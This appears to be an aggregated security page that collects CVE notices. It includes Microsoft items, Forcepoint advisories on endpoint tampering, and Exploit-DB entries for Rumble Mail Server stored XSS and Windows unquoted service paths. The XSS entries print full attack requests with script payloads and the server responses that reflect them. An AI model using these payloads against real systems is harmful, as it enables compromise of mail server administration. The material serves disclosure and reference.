Summary Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability.

Microsoft’s Response to CVE-2022-22965 Spring Framework

Microsoft is excited to announce the addition of Exchange on-premises, SharePoint on-premises, and Skype for Business on-premises to the Applications and On-Premises Servers Bounty Program.
Through this expanded program, we encourage researchers to discover and report high-impact security vulnerabilities to help protect customers. We offer awards up to $26,000 USD for eligible submissions.

On-Premises Servers Products are Here! Introducing the Applications and On-Premises Servers Bug Bounty Program

Forcepoint One Endpoint prior to version 22.01 installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user to disable Forcepoint One Endpoint and the protection offered by it.

![Forcepoint logo](https://help.forcepoint.com/security/CVE/ForcepointLogo.png)

**Security Advisory: CVE-2022-27609 - Incorrect Authorization******SUMMARY****

This advisory describes the Incorrect Authorization vulnerability (CVE-2022-27609) and its potential effect on Forcepoint products.

****INFORMATION****

**Published Date:** October 27, 2021

**Last Update:**March 28, 2022  
**Security Advisory Status:** Published  
**Security Advisory severity:** High  
**CVE Number(s):** CVE-2022-27609

**Security Advisory Summary**

The software performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions. 

Forcepoint One Endpoint prior to version 22.01 installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user to disable Forcepoint One Endpoint and the protection offered by it.

**Affected products**

*   Forcepoint One Endpoint (Web Proxy Connect, Web Direct Connect, DLP, Combined Endpoints).

****RESOLUTION****

**Workarounds**

There are no workarounds at this time.

**Hotfix and information about other fixes**

The Endpoint version 22.01 includes the fix. See Release Notes for Forcepoint F1E v22.01 for more details on the latest Endpoint release.

**_Forcepoint would like to thank mr.d0x - @mrd0x for discovering and working with us to responsibly disclose this vulnerability._**

CVE-2022-27609

Forcepoint One Endpoint prior to version 22.01 installed on Microsoft Windows is vulnerable to registry key tampering by users with Administrator privileges. This could result in a user disabling anti-tampering mechanisms which would then allow the user to disable Forcepoint One Endpoint and the protection offered by it.

![Forcepoint logo](https://help.forcepoint.com/security/CVE/ForcepointLogo.png)

**Security Advisory: CVE-2022-27608 - Incorrect Authorization******SUMMARY****

This advisory describes the Incorrect Authorization vulnerability (CVE-2022-27608) and its potential effect on Forcepoint products.

****INFORMATION****

**Published Date:** October 27, 2021

**Last Update:**March 28, 2022  
**Security Advisory Status:** Published  
**Security Advisory severity:** High  
**CVE Number(s):** CVE-2022-27608

**Security Advisory Summary**

The software performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions. 

Forcepoint One Endpoint prior to version 22.01 installed on Microsoft Windows is vulnerable to registry key tampering by users with Administrator privileges. This could result in a user disabling anti-tampering mechanisms which would then allow the user to disable Forcepoint One Endpoint and the protection offered by it.

**Affected products**

*   Forcepoint One Endpoint (Web Proxy Connect, Web Direct Connect, DLP, Combined Endpoints).

****RESOLUTION****

**Workarounds**

There are no workarounds at this time.

**Hotfix and information about other fixes**

The Endpoint version 22.01 includes the fix. See Release Notes for Forcepoint F1E v22.01 for more details on the latest Endpoint release.

**_Forcepoint would like to thank mr.d0x - @mrd0x for discovering and working with us to responsibly disclose this vulnerability._**

CVE-2022-27608

Authenticated (subscriber or higher user role if allowed to access projects) Stored Cross-Site Scripting (XSS) vulnerability in weDevs WP Project Manager (WordPress plugin) versions <= 2.4.13.

CVE-2021-36826: WP Project Manager – Project, Task Management & Team Collaboration Software

A Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the username parameter.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Exploit:
    POST /users HTTP/1.1
    Host: 127.0.0.1:2580
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 96
    Origin: http://127.0.0.1:2580
    Authorization: Basic YWRtaW46YWRtaW4=
    Connection: keep-alive
    Referer: http://127.0.0.1:2580/users
    Upgrade-Insecure-Requests: 1
    
    username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on a.com<br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
    
    
    <h1>RumbleLua users </h1>
    <p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
    Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
    while regular users can only
    see and edit the domains they have access to.
    </p>
    <table class="elements">
      <tr>
        <th>Create a new user:</th>
      </tr>
    <tr>
    <td>
    <form action="/users" method="post" name="makeuser">
    
      <div style="width: 300px; text-align:right; float: left;">
        <label for="username"><strong>Username:</strong></label>
        <input name="username" autocomplete="off" type="text" id="username" >
        <br>
        <label for="password"><strong>Password:</strong></label>
        <input type="password" autocomplete="off" name="password" id="password">
        <br />
        <label for="password"><strong>Access rights:</strong></label>
        <select name="rights" size="4" style="width: 150px;" multiple="multiple">
        <option value="*" style="color:#C33; font-weight:bold;">Full control</option>
        <optgroup label="Domains:">
            </optgroup>
        </select>
          </div>
        <p><br /><br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    
          &nbsp;&nbsp;
          <input type="submit" name="submit" id="submit" value="Submit" />
        </p>
    
    </form>
    </td>
    </tr>
    </table>
    <table width="200" class="elements">
      <tr>
        <th>Username</th>
        <th>Rights</th>
        <th>Actions</th>
      </tr>
      <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
        <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
        <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
      </table>
    <p>&nbsp;</p>
    
    
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

CVE-2021-43462: Offensive Security’s Exploit Database Archive

A Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the (1) domain and (2) path parameters.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Info
    The parameters `domain` and `path` are vulnerable to stored XSS.
    
    # Exploit:
    POST /domains HTTP/1.1
    Host: 127.0.0.1:2580
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 119
    Origin: http://127.0.0.1:2580
    Authorization: Basic YWRtaW46YWRtaW4=
    Connection: keep-alive
    Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
    Upgrade-Insecure-Requests: 1
    
    domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on a<br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
      <h2>Domains</h2>
    <p>
      <table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td>			<form action="/domains" method="post" id='create'>
    			<div>
    			<div >
    				<div class='form_key'>
    					Domain name:
    				</div>
    				<div class='form_value'>
    					<input type="text" name="domain"/>
    				</div>
    			</div>
    
    			<div>
    				<div class='form_key'>
    					Optional alt. storage path:
    				</div>
    				<div class='form_value'>
    					<input type="text" name="path"/>
    				</div>
    			</div>
    
    
    			<div class='form_el' id='domainsave' >
    				<div class='form_key'>
    						<input type="hidden" name="create" value="true"/>
    					<input class="button" type="submit" value="Save domain"/>
    					<input class="button"  type="reset" value="Reset"/>
    				</div>
    			</div>
    			<br/><br/><br/><br/><br />
    			</div>
    			</form>
    			</td></tr></table></p>
    <p>&nbsp;</p>
    <table class="elements" border='0' cellpadding='5' cellspacing='1'>
      <tr><th>Domain</th><th>Actions</th></tr>
    <tr><td><img src='/icons/house.png' align='absmiddle'/>&nbsp;<a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a>  <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table>
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

CVE-2021-43459: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exists in System Explorer 7.0.0 via via a specially crafted file in the SystemExplorerHelpService service executable path.

    # Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
    # Date: 2020-10-14
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://systemexplorer.net/
    # Software Link:  http://systemexplorer.net/download/SystemExplorerSetup.exe
    # Version: Version 7.0.0
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Service info:
    
    C:\Users\m507>sc qc SystemExplorerHelpService
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: SystemExplorerHelpService
            TYPE               : 20  WIN32_SHARE_PROCESS
            START_TYPE         : 3   DEMAND_START
            ERROR_CONTROL      : 0   IGNORE
            BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : System Explorer Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    C:\Users\m507>
    
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

CVE-2021-43460: Offensive Security’s Exploit Database Archive

An Unquoted Service Path vulnerability exists in Ext2Fsd v0.68 via a specially crafted file in the Ext2Srv Service executable service path.

    # Exploit Title: Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path
    # Date: 2021-1-19
    # Exploit Author: Mohammed Alshehri
    # Software Link:  https://sourceforge.net/projects/ext2fsd/files/latest/download
    # Version: 0.68
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    
    # Service info:
    C:\Users\m507>sc qc Ext2Srv
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: Ext2Srv
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files\Ext2Fsd\Ext2Srv.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Ext2 Management Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    
    C:\Users\m507>
    
    
    # Exploit:
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

Tag

#microsoft